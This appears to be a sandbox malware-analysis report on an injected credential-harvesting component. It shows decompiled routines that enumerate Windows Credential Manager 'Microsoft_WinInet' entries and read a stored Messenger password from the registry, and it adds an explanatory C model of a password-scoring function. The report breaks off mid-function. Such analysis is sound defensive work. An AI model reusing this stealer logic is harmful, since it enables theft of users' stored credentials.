				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
				GetWindow(GetWindow(_t32, 5), 0);
				do {
					__eax = E00401601(__edi, __esi);
					__edi = GetWindow(__edi, 2);
				} while (__edi != 0);
				__esi = GetDlgItem;
				__edi = 0x3ed;
				__eax = GetDlgItem( *(__ebx + 4), 0x3ed);
				"VWh\\MA"();
				 *__esp = 0x3ee;
				__eax = GetDlgItem( *(__ebx + 4), __eax);
				"VWh\\MA"();
				 *__esp = 0x3ef;
				__eax = GetDlgItem( *(__ebx + 4), __eax);
				"VWh\\MA"();
				 *__esp = 0x3f4;
				"VWh\\MA"();
				__eax =  *(__ebx + 4);
				__ecx = __eax;
				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
				_pop(__edi);
				_pop(__esi);
				__ecx = __ebx;
				_pop(__ebx);
				_t36 = _t27;
				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
				 *((intOrPtr*)( *_t36 + 0x18))();
				E0040649B(_t30,  *((intOrPtr*)(_t36 + 4)));
				return 0;
			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32 ref: 00405C05
                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405C1D
                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 00405C20
                                                                                                                                                                    • Part of subcall function 00401601: GetWindowRect.USER32 ref: 00401610
                                                                                                                                                                    • Part of subcall function 00401601: MapWindowPoints.USER32 ref: 0040162B
                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405C2C
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C43
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C55
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C67
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C79
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405C87
                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 00405C8A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2187283481-0
                                                                                                                                                                  • Opcode ID: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                                                                                                                                                                  • Instruction ID: 70b7e768433fb03072553d07e5bd29f06e019e0bb4b5ab736e3f65cd75bfe615
                                                                                                                                                                  • Opcode Fuzzy Hash: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                                                                                                                                                                  • Instruction Fuzzy Hash: 09118271500304ABDB216F31CC89E5BBFADEF81715F05883AB444AB1A1CB7DD8018B28
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
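The decompiled function E00401A0F listed next is hard to read in raw form, so here is an added, cleaned-up model of what it computes. This is example code written for this page, not the sample's own source and not attributed to any particular tool. Reading the listing: a first pass counts characters per class (uppercase, lowercase, digits, the punctuation ranges 0x20-0x2F, 0x3A-0x40, 0x5B-0x60 and 0x7B-0x7E, and bytes above 0x7E); a second pass keeps a buffer of characters seen so far (grown by E004045F2), linearly searches it for each new character, and adds one of five float weights (globals at 0x415598, 0x4155A0, 0x4155A8, 0x4155B0, 0x4155B8) depending on whether the character is new and how far its byte value is from the previous one; the tail then starts building a character-set size (26 for any uppercase, 26 more for any lowercase). That is the shape of a password-strength estimator, which fits the credential-recovery tooling flagged in this report, but that attribution is an inference. The weight values are not on the page, so the model below only counts how often each weight would be applied; the digit and punctuation contributions in pw_charset_size are assumptions, since the listing is cut off after the lowercase step, and the byte values are treated as unsigned even though the decompiler shows signed char.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Which of the five float weights E00401A0F adds for a character. Their values
 * are not on the page, so this model only counts how often each is applied. */
enum {
    BUCKET_FIRST_OR_FAR, /* first char, or a new char > 10 codes from its predecessor (0x415598) */
    BUCKET_ADJACENT,     /* identical to, or +/-1 from, the previous char (0x4155B8) */
    BUCKET_REPEAT,       /* seen earlier, but not identical to the previous char (0x4155B0) */
    BUCKET_NEAR,         /* new char 2..5 codes from its predecessor (0x4155A8) */
    BUCKET_MID,          /* new char 6..10 codes from its predecessor (0x4155A0) */
    BUCKET_COUNT
};

typedef struct {
    int upper, lower, digit, punct_low, punct_other, high; /* _v56, _v52, _v48, _v44, _v60, _v40 */
    int unique;                 /* length of the distinct-character buffer (_v20 / _v8) */
    int bucket[BUCKET_COUNT];
} pw_stats;

static int in_range(unsigned c, unsigned lo, unsigned hi) { return c >= lo && c <= hi; }

/* Model of the main loop of E00401A0F. Bytes are treated as unsigned here
 * (assumption: the decompiler shows signed char, so bytes >= 0x80 may be
 * bucketed differently by the original). */
pw_stats pw_analyze(const char *pw)
{
    pw_stats s;
    unsigned char seen[256];    /* stands in for the buffer grown by E004045F2 */
    size_t n = strlen(pw);
    memset(&s, 0, sizeof s);
    for (size_t i = 0; i < n; i++) {
        unsigned c = (unsigned char)pw[i];

        /* Pass 1: character-class counters, exactly the ranges in the listing. */
        if (in_range(c, 'A', 'Z')) s.upper++;
        if (in_range(c, 'a', 'z')) s.lower++;
        if (in_range(c, '0', '9')) s.digit++;
        if (in_range(c, 0x20, 0x2f)) s.punct_low++;        /* space and !"#$%&'()*+,-./ */
        if (in_range(c, 0x3a, 0x40) || in_range(c, 0x5b, 0x60) || in_range(c, 0x7b, 0x7e))
            s.punct_other++;                                /* :;<=>?@  [\]^_`  {|}~ */
        if (c > 0x7e) s.high++;                             /* DEL and non-ASCII bytes */

        /* Pass 2: novelty of the character and its distance from the previous one. */
        if (i == 0) {
            seen[s.unique++] = (unsigned char)c;
            s.bucket[BUCKET_FIRST_OR_FAR]++;
            continue;
        }
        int found = memchr(seen, (int)c, (size_t)s.unique) != NULL;   /* the L21 linear search */
        int diff = abs((int)c - (int)(unsigned char)pw[i - 1]);
        if (found) {
            s.bucket[diff == 0 ? BUCKET_ADJACENT : BUCKET_REPEAT]++;
            continue;
        }
        seen[s.unique++] = (unsigned char)c;
        if (diff == 1)                    s.bucket[BUCKET_ADJACENT]++;
        else if (diff >= 2 && diff <= 5)  s.bucket[BUCKET_NEAR]++;
        else if (diff >= 6 && diff <= 10) s.bucket[BUCKET_MID]++;
        else                              s.bucket[BUCKET_FIRST_OR_FAR]++;
    }
    return s;
}

/* Tail of E00401A0F as far as the listing shows: 26 for any uppercase letter,
 * 26 more for any lowercase letter. The listing is cut off after that step;
 * the digit and punctuation terms are an ASSUMPTION about the remainder. */
int pw_charset_size(const pw_stats *s)
{
    int size = 0;
    if (s->upper) size += 26;
    if (s->lower) size += 26;
    if (s->digit) size += 10;                          /* ASSUMED */
    if (s->punct_low || s->punct_other) size += 33;    /* ASSUMED: 33 printable ASCII symbols */
    return size;
}

int pw_charset_size_of(const char *pw)
{
    pw_stats s = pw_analyze(pw);
    return pw_charset_size(&s);
}

int main(void)
{
    const char *samples[] = { "Passw0rd!", "abcabc", "aaaa" };   /* constructed inputs */
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        pw_stats s = pw_analyze(samples[i]);
        printf("%-10s unique=%d upper=%d lower=%d digit=%d punct=%d charset=%d "
               "first/far=%d adj=%d repeat=%d near=%d mid=%d\n",
               samples[i], s.unique, s.upper, s.lower, s.digit,
               s.punct_low + s.punct_other, pw_charset_size(&s),
               s.bucket[0], s.bucket[1], s.bucket[2], s.bucket[3], s.bucket[4]);
    }
    return 0;
}
```

For triage this matters less for what the function scores than for what it tells you about the dump: a routine that classifies every byte of a string, tracks distinct characters and rewards distance between consecutive byte values only makes sense applied to recovered secrets, so its presence in the injected image at 0x400000 of process 18 is one more indicator that this region is a credential-harvesting component rather than the loader.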

                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E00401A0F(char* __edi, int __fp0) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				int _v28;
                                                                                                                                                                  				int _v36;
                                                                                                                                                                  				void* _v40;
                                                                                                                                                                  				void* _v44;
                                                                                                                                                                  				void* _v48;
                                                                                                                                                                  				void* _v52;
                                                                                                                                                                  				void* _v56;
                                                                                                                                                                  				void* _v60;
                                                                                                                                                                  				char _v64;
                                                                                                                                                                  				int _t79;
                                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                                  				int _t81;
                                                                                                                                                                  				signed int _t94;
                                                                                                                                                                  				int _t98;
                                                                                                                                                                  				int _t100;
                                                                                                                                                                  				void* _t104;
                                                                                                                                                                  				void* _t106;
                                                                                                                                                                  				intOrPtr _t115;
                                                                                                                                                                  				char _t117;
                                                                                                                                                                  				char* _t118;
                                                                                                                                                                  				void* _t119;
                                                                                                                                                                  				void* _t120;
                                                                                                                                                                  				int _t122;
                                                                                                                                                                  				signed int _t123;
                                                                                                                                                                  				int* _t125;
                                                                                                                                                                  				int _t159;
                                                                                                                                                                  				int _t165;
                                                                                                                                                                  
                                                                                                                                                                  				_t159 = __fp0;
                                                                                                                                                                  				_t118 = __edi;
                                                                                                                                                                  				_t125 = (_t123 & 0xfffffff8) - 0x40;
                                                                                                                                                                  				_t79 = strlen(__edi);
                                                                                                                                                                  				asm("fldz");
                                                                                                                                                                  				_t104 = 0;
                                                                                                                                                                  				_v28 = __fp0;
                                                                                                                                                                  				_t120 = 0;
                                                                                                                                                                  				_t106 = _t119;
                                                                                                                                                                  				_v36 = _t79;
                                                                                                                                                                  				_v56 = 0;
                                                                                                                                                                  				_v52 = 0;
                                                                                                                                                                  				_v48 = 0;
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v60 = 0;
                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                  				_v12 = 0x20;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				if(_t79 > 0) {
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t117 =  *((intOrPtr*)(_t120 + _t118));
                                                                                                                                                                  						_v64 = _t117;
                                                                                                                                                                  						if(_t117 - 0x41 <= 0x19) {
                                                                                                                                                                  							_v56 = _v56 + 1;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t117 - 0x61 <= 0x19) {
                                                                                                                                                                  							_v52 = _v52 + 1;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t117 - 0x30 <= 9) {
                                                                                                                                                                  							_v48 = _v48 + 1;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t117 - 0x20 <= 0xf) {
                                                                                                                                                                  							_v44 = _v44 + 1;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t117 - 0x3a <= 6) {
                                                                                                                                                                  							_v60 = _v60 + 1;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t117 - 0x5b <= 5) {
                                                                                                                                                                  							_v60 = _v60 + 1;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t117 < 0x7b) {
                                                                                                                                                                  							L16:
                                                                                                                                                                  							if(_t117 > 0x7e) {
                                                                                                                                                                  								goto L17;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							if(_t117 > 0x7e) {
                                                                                                                                                                  								L17:
                                                                                                                                                                  								_v40 = _v40 + 1;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_v60 = _v60 + 1;
                                                                                                                                                                  								goto L16;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t120 != _t104) {
                                                                                                                                                                  							_t94 = 0;
                                                                                                                                                                  							if(_v8 <= 0) {
                                                                                                                                                                  								L27:
                                                                                                                                                                  								_t94 = _t94 | 0xffffffff;
                                                                                                                                                                  							} else {
                                                                                                                                                                   								L21:
                                                                                                                                                                  								if(_t94 < 0 || _t94 >= _v8) {
                                                                                                                                                                  									_t115 = 0;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t115 =  *((intOrPtr*)(_v20 + _t94));
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_t115 == _t117) {
                                                                                                                                                                  									goto L28;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t94 = _t94 + 1;
                                                                                                                                                                  								if(_t94 < _v8) {
                                                                                                                                                                  									goto L21;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									goto L27;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							L28:
                                                                                                                                                                  							_t104 = 0;
                                                                                                                                                                  							if(_t94 < 0) {
                                                                                                                                                                  								E004045F2( &_v20, _v64);
                                                                                                                                                                  								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
                                                                                                                                                                  								_pop(_t106);
                                                                                                                                                                  								if(_t98 != 1) {
                                                                                                                                                                  									_t47 = _t98 - 2; // -2
                                                                                                                                                                  									_t106 = _t47;
                                                                                                                                                                  									if(_t106 > 3) {
                                                                                                                                                                  										if(_t98 < 6) {
                                                                                                                                                                  											if(_t98 > 0xa) {
                                                                                                                                                                  												goto L40;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											if(_t98 > 0xa) {
                                                                                                                                                                  												goto L40;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t159 = _v28 +  *0x4155a0;
                                                                                                                                                                  											}
                                                                                                                                                                  											goto L41;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t159 = _v28 +  *0x4155a8;
                                                                                                                                                                  										goto L41;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t165 = _v28;
                                                                                                                                                                  									goto L30;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
                                                                                                                                                                  								_t165 = _v28;
                                                                                                                                                                  								_pop(_t106);
                                                                                                                                                                  								if(_t100 != 0) {
                                                                                                                                                                  									_t159 = _t165 +  *0x4155b0;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									L30:
                                                                                                                                                                  									_t159 = _t165 +  *0x4155b8;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L41;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							E004045F2( &_v20, _v64);
                                                                                                                                                                  							L40:
                                                                                                                                                                  							_t159 = _v28 +  *0x415598;
                                                                                                                                                                  							L41:
                                                                                                                                                                  							_v28 = _t159;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t120 = _t120 + 1;
                                                                                                                                                                  					} while (_t120 < _v36);
                                                                                                                                                                  				}
                                                                                                                                                                  				_v64 = _t104;
                                                                                                                                                                  				_t80 = 0x1a;
                                                                                                                                                                  				if(_v56 != _t104) {
                                                                                                                                                                  					_v64 = _t80;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v52 != _t104) {
                                                                                                                                                                  					_v64 = _v64 + _t80;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v48 != _t104) {
                                                                                                                                                                  					_v64 = _v64 + 0xa;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v44 != _t104) {
                                                                                                                                                                  					_v64 = _v64 + 0x10;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v60 != _t104) {
                                                                                                                                                                  					_v64 = _v64 + 0x11;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v40 != _t104) {
                                                                                                                                                                  					_v64 = _v64 + 0x1e;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v64 <= _t104) {
                                                                                                                                                                  					if(_v20 != _t104) {
                                                                                                                                                                  						free(_v20);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t81 = 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					asm("fild dword [esp+0xc]");
                                                                                                                                                                  					_push(_t106);
                                                                                                                                                                  					_push(_t106);
                                                                                                                                                                  					 *_t125 = _t159;
                                                                                                                                                                  					L00412066();
                                                                                                                                                                  					_v36 = _t159;
                                                                                                                                                                  					 *_t125 =  *0x415590;
                                                                                                                                                                  					L00412066();
                                                                                                                                                                  					asm("fdivr qword [esp+0x30]");
                                                                                                                                                                  					asm("fistp qword [esp+0x30]");
                                                                                                                                                                  					_t122 = _v28;
                                                                                                                                                                  					if(_v20 != _t104) {
                                                                                                                                                                  						free(_v20);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t81 = _t122;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t81;
                                                                                                                                                                  			}

[Disassembly listing residue: instruction addresses 0x00401a0f through 0x00401be2 only; the instruction column was not captured in this extract.]
                                                                                                                                                                  0x00401be2
                                                                                                                                                                  0x00401beb
                                                                                                                                                                  0x00401bed
                                                                                                                                                                  0x00401bed
                                                                                                                                                                  0x00401bf6
                                                                                                                                                                  0x00401c42
                                                                                                                                                                  0x00401c48
                                                                                                                                                                  0x00401c4d
                                                                                                                                                                  0x00401c4e
                                                                                                                                                                  0x00401bf8
                                                                                                                                                                  0x00401bf8
                                                                                                                                                                  0x00401bfc
                                                                                                                                                                  0x00401bfd
                                                                                                                                                                  0x00401bfe
                                                                                                                                                                  0x00401c01
                                                                                                                                                                  0x00401c06
                                                                                                                                                                  0x00401c10
                                                                                                                                                                  0x00401c13
                                                                                                                                                                  0x00401c1c
                                                                                                                                                                  0x00401c26
                                                                                                                                                                  0x00401c2a
                                                                                                                                                                  0x00401c2e
                                                                                                                                                                  0x00401c34
                                                                                                                                                                  0x00401c39
                                                                                                                                                                  0x00401c3a
                                                                                                                                                                  0x00401c3a
                                                                                                                                                                  0x00401c55

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 667451143-3916222277
                                                                                                                                                                  • Opcode ID: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                                                                                                                                                                  • Instruction ID: 0a6132ce2dc9cc3df9a7f1a3dcc42749ccde8b25e91b24a7214be5fd0ed86434
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                                                                                                                                                                  • Instruction Fuzzy Hash: A7619A30409781DFDB209F25848006BBBF1FB89315F909D7FF5D5A22A1E739A846CB0A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E004077C5(void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				short _v534;
                                                                                                                                                                  				void _v1042;
                                                                                                                                                                  				void _v1044;
                                                                                                                                                                  				long _v1080;
                                                                                                                                                                  				intOrPtr _v1084;
                                                                                                                                                                  				intOrPtr _v1088;
                                                                                                                                                                  				intOrPtr _v1096;
                                                                                                                                                                  				int _v1104;
                                                                                                                                                                  				char _v1108;
                                                                                                                                                                  				intOrPtr _v1112;
                                                                                                                                                                  				intOrPtr _v1116;
                                                                                                                                                                  				intOrPtr _v1120;
                                                                                                                                                                  				intOrPtr _v1124;
                                                                                                                                                                  				intOrPtr _v1128;
                                                                                                                                                                  				intOrPtr _v1132;
                                                                                                                                                                  				long* _v1136;
                                                                                                                                                                  				wchar_t* _v1140;
                                                                                                                                                                  				wchar_t* _v1144;
                                                                                                                                                                  				intOrPtr _v1148;
                                                                                                                                                                  				char _v1152;
                                                                                                                                                                  				intOrPtr _v1156;
                                                                                                                                                                  				char _v1160;
                                                                                                                                                                  				void* _v1164;
                                                                                                                                                                  				void* _v1168;
                                                                                                                                                                  				int _v1172;
                                                                                                                                                                  				intOrPtr _v1176;
                                                                                                                                                                  				char _v1180;
                                                                                                                                                                  				char _v1184;
                                                                                                                                                                  				signed int _v1188;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  				int _t83;
                                                                                                                                                                  				wchar_t* _t109;
                                                                                                                                                                  				wchar_t* _t110;
                                                                                                                                                                  				signed int _t120;
                                                                                                                                                                  				int _t126;
                                                                                                                                                                  				void* _t129;
                                                                                                                                                                  				intOrPtr _t134;
                                                                                                                                                                  				signed int _t140;
                                                                                                                                                                  				void* _t142;
                                                                                                                                                                  				void* _t143;
                                                                                                                                                                  				void* _t144;
                                                                                                                                                                  
                                                                                                                                                                  				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
                                                                                                                                                                  				_push(_t129);
                                                                                                                                                                  				_v1108 = 0;
                                                                                                                                                                  				_v1104 = 0;
                                                                                                                                                                  				if(E00404651( &_v1108, _t129, __eflags) != 0) {
                                                                                                                                                                  					_v1184 = 0;
                                                                                                                                                                  					_v1180 = 0;
                                                                                                                                                                  					if(_v1088 == 0) {
                                                                                                                                                                  						_t76 = 0;
                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t76 != 0) {
                                                                                                                                                                  						_t120 = 9;
                                                                                                                                                                  						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
                                                                                                                                                                  						_t143 = _t142 + 0xc;
                                                                                                                                                                  						_v1172 = wcslen( &_v1080);
                                                                                                                                                                  						_v1176 = 1;
                                                                                                                                                                  						_v1188 = 0;
                                                                                                                                                                  						if(_v1180 > 0) {
                                                                                                                                                                  							while(_v1176 != 0) {
                                                                                                                                                                  								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
                                                                                                                                                                  								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
                                                                                                                                                                  								_t143 = _t143 + 0xc;
                                                                                                                                                                  								if(_t83 == 0) {
                                                                                                                                                                  									do {
                                                                                                                                                                  										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
                                                                                                                                                                  										 *(_t83 + 0x418968) =  *_t25 << 2;
                                                                                                                                                                  										_t83 = _t83 + 2;
                                                                                                                                                                  										_t152 = _t83 - 0x4a;
                                                                                                                                                                  									} while (_t83 < 0x4a);
                                                                                                                                                                  									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
                                                                                                                                                                  									_t139 =  &_v532;
                                                                                                                                                                  									_v1160 = 0x4a;
                                                                                                                                                                  									_v1156 = 0x418968;
                                                                                                                                                                  									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
                                                                                                                                                                  									E004046E1( &_v532);
                                                                                                                                                                  									if(E004047AA( &_v532, _t152) != 0 && E0040481B(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
                                                                                                                                                                  										_v1044 = 0;
                                                                                                                                                                  										memset( &_v1042, 0, 0x1fe);
                                                                                                                                                                  										_t126 = _v1168;
                                                                                                                                                                  										_t144 = _t143 + 0xc;
                                                                                                                                                                  										if(_t126 > 0x1fa) {
                                                                                                                                                                  											_t126 = 0x1fa;
                                                                                                                                                                  										}
                                                                                                                                                                  										memcpy( &_v1044, _v1164, _t126);
                                                                                                                                                                  										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
                                                                                                                                                                  										_v1124 =  *((intOrPtr*)(_t134 + 4));
                                                                                                                                                                  										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
                                                                                                                                                                  										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
                                                                                                                                                                  										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
                                                                                                                                                                  										_v1144 =  *(_t134 + 8);
                                                                                                                                                                  										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
                                                                                                                                                                  										_t109 =  &_v1044;
                                                                                                                                                                  										_v534 = 0;
                                                                                                                                                                  										_v1140 = _t109;
                                                                                                                                                                  										_v1136 = 0x4135f4;
                                                                                                                                                                  										_t110 = wcschr(_t109, 0x3a);
                                                                                                                                                                  										_t143 = _t144 + 0x14;
                                                                                                                                                                  										if(_t110 != 0) {
                                                                                                                                                                  											 *_t110 = 0;
                                                                                                                                                                  											_v1136 =  &(_t110[0]);
                                                                                                                                                                  										}
                                                                                                                                                                  										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
                                                                                                                                                                  										LocalFree(_v1168);
                                                                                                                                                                  									}
                                                                                                                                                                  									E004047FB( &_v532);
                                                                                                                                                                  								}
                                                                                                                                                                  								_v1188 = _v1188 + 1;
                                                                                                                                                                  								if(_v1188 < _v1180) {
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						L18:
                                                                                                                                                                  						_v1096(_v1184);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return E004046CC( &_v1108);
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,7479F420), ref: 0040465E
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040782F
                                                                                                                                                                  • wcsncmp.MSVCRT(?,?,?), ref: 00407873
                                                                                                                                                                  • memset.MSVCRT ref: 00407907
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040792B
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040797F
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004079A9
                                                                                                                                                                    • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                  • String ID: J$Microsoft_WinInet
                                                                                                                                                                  • API String ID: 2413121283-260894208
                                                                                                                                                                  • Opcode ID: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                                                                                                                                                                  • Instruction ID: 0e9b9eaeb9102773f5efe30ff018f7355b1463afce593653dd7f5536c2c1a2ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E51E3B1A083469FD710DF65C880A9BB7E8BF89304F00492EF999D3250E778E955CB97
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040DB04(char* __ebx, void** _a4) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				int _v24;
                                                                                                                                                                  				char* _v28;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				char _v556;
                                                                                                                                                                  				char _v557;
                                                                                                                                                                  				char _v1578;
                                                                                                                                                                  				void _v1580;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				long _t39;
                                                                                                                                                                  				int _t43;
                                                                                                                                                                  				char _t48;
                                                                                                                                                                  				char* _t63;
                                                                                                                                                                  				int* _t67;
                                                                                                                                                                  
                                                                                                                                                                  				_t63 = __ebx;
                                                                                                                                                                  				_t67 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0x400;
                                                                                                                                                                  				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
                                                                                                                                                                  				if(_t39 != 0) {
                                                                                                                                                                  					L13:
                                                                                                                                                                  					RegCloseKey( *_a4);
                                                                                                                                                                  					return _v16;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t43 = _t39 + 1;
                                                                                                                                                                  				if(_v12 <= _t43) {
                                                                                                                                                                  					goto L13;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t74 = _v1580 - 0x20;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				if(_v1580 >= 0x20) {
                                                                                                                                                                  					_v8 = _t43;
                                                                                                                                                                  					L10:
